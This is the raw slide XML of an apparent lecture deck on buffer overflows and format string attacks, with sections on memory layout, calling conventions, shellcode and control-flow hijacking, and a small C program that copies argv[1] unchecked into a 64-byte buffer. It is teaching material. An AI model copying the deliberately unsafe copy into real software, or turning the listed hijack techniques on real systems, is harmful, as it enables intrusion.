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3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74" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId68"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId69"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="836" r:id="rId3"/>
    <p:sldId id="838" r:id="rId4"/>
    <p:sldId id="839" r:id="rId5"/>
    <p:sldId id="840" r:id="rId6"/>
    <p:sldId id="841" r:id="rId7"/>
    <p:sldId id="842" r:id="rId8"/>
    <p:sldId id="843" r:id="rId9"/>
    <p:sldId id="844" r:id="rId10"/>
    <p:sldId id="845" r:id="rId11"/>
    <p:sldId id="846" r:id="rId12"/>
    <p:sldId id="847" r:id="rId13"/>
    <p:sldId id="848" r:id="rId14"/>
    <p:sldId id="849" r:id="rId15"/>
    <p:sldId id="850" r:id="rId16"/>
    <p:sldId id="851" r:id="rId17"/>
    <p:sldId id="852" r:id="rId18"/>
    <p:sldId id="853" r:id="rId19"/>
    <p:sldId id="854" r:id="rId20"/>
    <p:sldId id="855" r:id="rId21"/>
    <p:sldId id="856" r:id="rId22"/>
    <p:sldId id="857" r:id="rId23"/>
    <p:sldId id="858" r:id="rId24"/>
    <p:sldId id="859" r:id="rId25"/>
    <p:sldId id="860" r:id="rId26"/>
    <p:sldId id="861" r:id="rId27"/>
    <p:sldId id="862" r:id="rId28"/>
    <p:sldId id="863" r:id="rId29"/>
    <p:sldId id="864" r:id="rId30"/>
    <p:sldId id="865" r:id="rId31"/>
    <p:sldId id="866" r:id="rId32"/>
    <p:sldId id="867" r:id="rId33"/>
    <p:sldId id="868" r:id="rId34"/>
    <p:sldId id="869" r:id="rId35"/>
    <p:sldId id="870" r:id="rId36"/>
    <p:sldId id="871" r:id="rId37"/>
    <p:sldId id="872" r:id="rId38"/>
    <p:sldId id="873" r:id="rId39"/>
    <p:sldId id="874" r:id="rId40"/>
    <p:sldId id="875" r:id="rId41"/>
    <p:sldId id="876" r:id="rId42"/>
    <p:sldId id="878" r:id="rId43"/>
    <p:sldId id="879" r:id="rId44"/>
    <p:sldId id="880" r:id="rId45"/>
    <p:sldId id="881" r:id="rId46"/>
    <p:sldId id="882" r:id="rId47"/>
    <p:sldId id="883" r:id="rId48"/>
    <p:sldId id="884" r:id="rId49"/>
    <p:sldId id="885" r:id="rId50"/>
    <p:sldId id="886" r:id="rId51"/>
    <p:sldId id="887" r:id="rId52"/>
    <p:sldId id="889" r:id="rId53"/>
    <p:sldId id="890" r:id="rId54"/>
    <p:sldId id="892" r:id="rId55"/>
    <p:sldId id="893" r:id="rId56"/>
    <p:sldId id="894" r:id="rId57"/>
    <p:sldId id="895" r:id="rId58"/>
    <p:sldId id="896" r:id="rId59"/>
    <p:sldId id="897" r:id="rId60"/>
    <p:sldId id="898" r:id="rId61"/>
    <p:sldId id="900" r:id="rId62"/>
    <p:sldId id="901" r:id="rId63"/>
    <p:sldId id="902" r:id="rId64"/>
    <p:sldId id="903" r:id="rId65"/>
    <p:sldId id="904" r:id="rId66"/>
    <p:sldId id="90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  <p14:sldId id="838"/>
            <p14:sldId id="839"/>
            <p14:sldId id="840"/>
            <p14:sldId id="841"/>
            <p14:sldId id="842"/>
            <p14:sldId id="843"/>
            <p14:sldId id="844"/>
            <p14:sldId id="845"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Control Flow Recap" id="{BE1A66DE-38CE-224B-99CC-769A022F23F6}">
          <p14:sldIdLst>
            <p14:sldId id="846"/>
            <p14:sldId id="847"/>
            <p14:sldId id="848"/>
            <p14:sldId id="849"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Buffer Overflows" id="{A90D30A3-D7E5-784F-A7DE-FB4C1ACD3F1F}">
          <p14:sldIdLst>
            <p14:sldId id="850"/>
            <p14:sldId id="851"/>
            <p14:sldId id="852"/>
            <p14:sldId id="853"/>
            <p14:sldId id="854"/>
            <p14:sldId id="855"/>
            <p14:sldId id="856"/>
            <p14:sldId id="857"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Shellcode" id="{3B835758-11BD-4B45-8751-71C8C0FBB473}">
          <p14:sldIdLst>
            <p14:sldId id="858"/>
            <p14:sldId id="859"/>
            <p14:sldId id="860"/>
            <p14:sldId id="861"/>
            <p14:sldId id="862"/>
            <p14:sldId id="863"/>
            <p14:sldId id="864"/>
            <p14:sldId id="865"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Format String Attacks" id="{C198C8D7-F1D0-A440-8944-3E427CAE3CF9}">
          <p14:sldIdLst>
            <p14:sldId id="866"/>
            <p14:sldId id="867"/>
            <p14:sldId id="868"/>
            <p14:sldId id="869"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Variadic Function Detour" id="{3ED85DE9-9F34-874D-92EE-1F5FFD93C864}">
          <p14:sldIdLst>
            <p14:sldId id="870"/>
            <p14:sldId id="871"/>
            <p14:sldId id="872"/>
            <p14:sldId id="873"/>
            <p14:sldId id="874"/>
            <p14:sldId id="875"/>
            <p14:sldId id="876"/>
            <p14:sldId id="878"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Format String Cont" id="{1A9E4114-273E-314F-8FFF-B281A2A57AB5}">
          <p14:sldIdLst>
            <p14:sldId id="879"/>
            <p14:sldId id="880"/>
            <p14:sldId id="881"/>
            <p14:sldId id="882"/>
            <p14:sldId id="883"/>
            <p14:sldId id="884"/>
            <p14:sldId id="885"/>
            <p14:sldId id="886"/>
            <p14:sldId id="887"/>
            <p14:sldId id="889"/>
            <p14:sldId id="890"/>
            <p14:sldId id="892"/>
            <p14:sldId id="893"/>
            <p14:sldId id="894"/>
            <p14:sldId id="895"/>
            <p14:sldId id="896"/>
            <p14:sldId id="897"/>
            <p14:sldId id="898"/>
            <p14:sldId id="900"/>
            <p14:sldId id="901"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="What's New" id="{125C1F6D-FF52-2842-B40B-38A0F335E731}">
          <p14:sldIdLst>
            <p14:sldId id="902"/>
            <p14:sldId id="903"/>
            <p14:sldId id="904"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Conclusion" id="{6606F7D1-48D8-374C-90CA-74FB06E2D4FF}">
          <p14:sldIdLst>
            <p14:sldId id="9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81791" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="64" d="100"/>
          <a:sy n="64" d="100"/>
        </p:scale>
        <p:origin x="1360" y="48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4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7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89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53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07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7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4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7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702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79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79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79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9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34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65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34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2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75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11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57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8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81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9170D3-89C4-BB42-836D-D925400CC7A3}" type="datetime1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C1F5B7F-F702-E24B-B97E-863D4E495E13}" type="datetime1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A9756D6-8139-C44F-931B-372F152FA7C2}" type="datetime1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E4327B-086F-C14D-B06F-CE57E273F375}" type="datetime1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BD3B-C321-3747-A281-298A36F52409}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/3/2014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16A47FA-0CEA-6947-B0F7-FA97FCD430B2}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>9/3/2014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3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224741A-E944-D140-BC85-0B12196E47E2}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>9/3/2014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272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8E2CF58-ABF8-1542-93D6-7995FC9E4430}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>9/3/2014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24FFC89-921A-FF44-8D48-0826225D1EE5}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>9/3/2014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2A3E-4BFE-AF46-B61A-E662D0A37735}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>9/3/2014</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00944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94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2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07D8CFC-0178-204C-AB67-9348AB6D8B74}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>9/3/2014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9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D7A3CB-B31F-F44D-BE5E-9BB9DAE334F7}" type="datetime1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C55D26C-3C72-B548-AB96-9791FD0CCC94}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>9/3/2014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18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AD62C055-4756-1D4B-84FC-6EEB2240FC7D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>9/3/2014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85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9C52985-00EB-6941-9B53-ECA48ECB33FB}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>9/3/2014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78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10A4823-B443-034C-8E87-89416A62590B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>9/3/2014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27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F6D151D-3159-114B-B1DE-9001868E6E90}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>9/3/2014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2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0E3A481-0504-AD45-AE58-E2170EFE9EB5}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>9/3/2014</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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5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8842061-E09A-C64F-AC91-6B22DD773FB7}" type="datetime1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8B15C4-75F8-8145-B332-9C9E6CC1694D}" type="datetime1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E902-58D7-5940-B7B2-BB1B96F0CB4F}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/3/2014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7BE05AF-3078-DE4E-8E55-E5E804412B8D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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38595AD-FC1D-6647-9C7B-6A6A09EB9496}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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8FB06B4-F6A6-3F44-9030-7566931308D3}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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BF8F280-9551-E344-89F9-EAAD5E158938}" type="datetime1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tags" Target="../tags/tag70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69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68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67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A990C2A9-FE53-4849-A08D-11DD13CE8E41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fld id="{AD4E1B4A-1481-9A4D-AA6D-3A68B1E1E51A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>9/3/2014</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0094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endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0094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8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/>
              <a:t>Exploits</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Buffer Overflows and Format String Attacks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Recap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05200" y="1263598"/>
            <a:ext cx="2362200" cy="5334000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92939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b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1295400"/>
            <a:ext cx="2362200" cy="5334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b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File system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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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1461374"/>
            <a:ext cx="1752600" cy="2805826"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E47932"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="E4793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Binary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38201" y="2057400"/>
            <a:ext cx="1295399" cy="1981200"/>
            <a:chOff x="1066801" y="2057400"/>
            <a:chExt cx="1295399" cy="1981200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rounded Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1066801" y="2057400"/>
              <a:ext cx="1295399" cy="685800"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F4AB70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Code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66801" y="2819400"/>
              <a:ext cx="1295399" cy="609600"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F4AB70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Data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66801" y="3581400"/>
              <a:ext cx="1295399" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F4AB70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...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038600" y="3657600"/>
            <a:ext cx="1295399" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4AB70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Stack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38600" y="4648200"/>
            <a:ext cx="1295399" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4AB70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Heap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29400" y="2667000"/>
            <a:ext cx="2362200" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92939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333999" y="1535668"/>
            <a:ext cx="3806968" cy="1131332"/>
            <a:chOff x="5333999" y="1535668"/>
            <a:chExt cx="3806968" cy="1131332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="3" name="Elbow Connector 2"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="21" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5333999" y="1997333"/>
              <a:ext cx="2476501" cy="669667"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2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019800" y="1535668"/>
              <a:ext cx="3121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Fetch, decode, execute</a:t>
              </a:r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34200" y="1066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333999" y="3733800"/>
            <a:ext cx="2802637" cy="1840775"/>
            <a:chOff x="5333999" y="3733800"/>
            <a:chExt cx="2802637" cy="1840775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="19" name="Elbow Connector 18"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5333999" y="3810000"/>
              <a:ext cx="2476501" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2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endCxn id="21" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5333999" y="3733800"/>
              <a:ext cx="2476501" cy="1371600"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2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019800" y="5112910"/>
              <a:ext cx="211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read and write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21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9597E-6 3.98334E-6 L 0.34572 -0.06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86" y="-3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cdecl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the default for Linux &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gcc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954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orange(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a, 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b)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{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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[16];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c, d;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if(a &gt; b)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 c = a;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else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 c = b;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d = red(c, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf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return d;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consola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9439"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6185958" y="1142999"/>
          <a:ext cx="1752600" cy="5600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-save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19354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c, d ≥ 28 bytes if stored on stack)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caller-save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orange’s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959243" y="2773678"/>
            <a:ext cx="1100454" cy="646331"/>
            <a:chOff x="7959243" y="3429000"/>
            <a:chExt cx="1100454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8229600" y="3429000"/>
              <a:ext cx="8300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  <a:p>
              <a:r>
                <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
                <a:t>frame</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" i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959243" y="4342229"/>
            <a:ext cx="1017511" cy="646331"/>
            <a:chOff x="7959243" y="3429000"/>
            <a:chExt cx="1017511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8229600" y="3429000"/>
              <a:ext cx="7471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i="1" dirty="0" smtClean="0"/>
                <a:t>stack</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" i="1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479809" y="1513840"/>
            <a:ext cx="1692391" cy="722531"/>
            <a:chOff x="4479809" y="1828800"/>
            <a:chExt cx="1692391" cy="722531"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Left Brace 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5867400" y="1828800"/>
              <a:ext cx="304800" cy="722531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9809" y="1866900"/>
              <a:ext cx="13931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parameter</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>area (caller)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51869" y="2246531"/>
            <a:ext cx="1320331" cy="2293817"/>
            <a:chOff x="4851869" y="2590800"/>
            <a:chExt cx="1320331" cy="2575560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Left Brace 46"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5867400" y="2590800"/>
              <a:ext cx="304800" cy="2575560"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 16668"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst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51869" y="3214206"/>
              <a:ext cx="1021095" cy="1328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orange’s</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>initial</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>stack</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>frame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355063" y="4545648"/>
            <a:ext cx="1817137" cy="1093152"/>
            <a:chOff x="4355063" y="2658280"/>
            <a:chExt cx="1817137" cy="2575560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="Left Brace 48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5867400" y="2658280"/>
              <a:ext cx="304800" cy="2575560"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 16668"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst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55063" y="2873479"/>
              <a:ext cx="1517901" cy="21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to be created</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>before</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>calling</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>red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6185958" y="4535488"/>
            <a:ext cx="1752600" cy="2206773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442502" y="5638800"/>
            <a:ext cx="1729698" cy="1088265"/>
            <a:chOff x="4442502" y="2658280"/>
            <a:chExt cx="1729698" cy="2575560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Left Brace 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5867400" y="2658280"/>
              <a:ext cx="304800" cy="2575560"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 16668"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst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42502" y="3195253"/>
              <a:ext cx="1430462" cy="152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after red has</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>been called</a:t>
              </a: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8305800" y="4988560"/>
            <a:ext cx="472440" cy="1371600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lIns="0" rtlCol="0" anchor="ctr" anchorCtr="1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grow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19555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Flow Hijack: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Always Computation + Control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b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>computation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+                          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>control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390775"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="933450" y="2515059"/>
          <a:ext cx="72771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/>
                <a:gridCol w="2209800"/>
                <a:gridCol w="1104900"/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 (aka payload)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2672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code injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>return-to-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Heap metadata overwrite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>return-oriented programming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>...</a:t>
            </a:r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092700" y="4267200"/>
            <a:ext cx="304800" cy="16002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86400" y="4313237"/>
            <a:ext cx="3352800" cy="132556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Same principle,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different mechanism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1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26328" y="4267200"/>
            <a:ext cx="373934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Assigned Reading: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Smashing the stack for fun and profit</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>by Aleph One</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="535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Buffer Overflows?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i="1" dirty="0" smtClean="0"/>
              <a:t>buffer overflow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>occurs when data is written </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>outside</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of the space allocated for the buffer.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>C does not check that writes are in-bound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Stack-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>covered in this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Heap-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>more advanced</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>very dependent on system and library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9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>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>include&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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main(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argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>**</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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[64]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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[1])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Dump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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0x080483e4 &lt;+0&gt;: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0x080483e5 &lt;+1&gt;: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0x080483e7 &lt;+3&gt;:	sub    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$72,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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0x080483ea &lt;+6&gt;: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12(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0x080483ed &lt;+9&gt;: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0x080483f0 &lt;+12&gt;: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>,4</a:t>
            </a:r>
            <a:r>
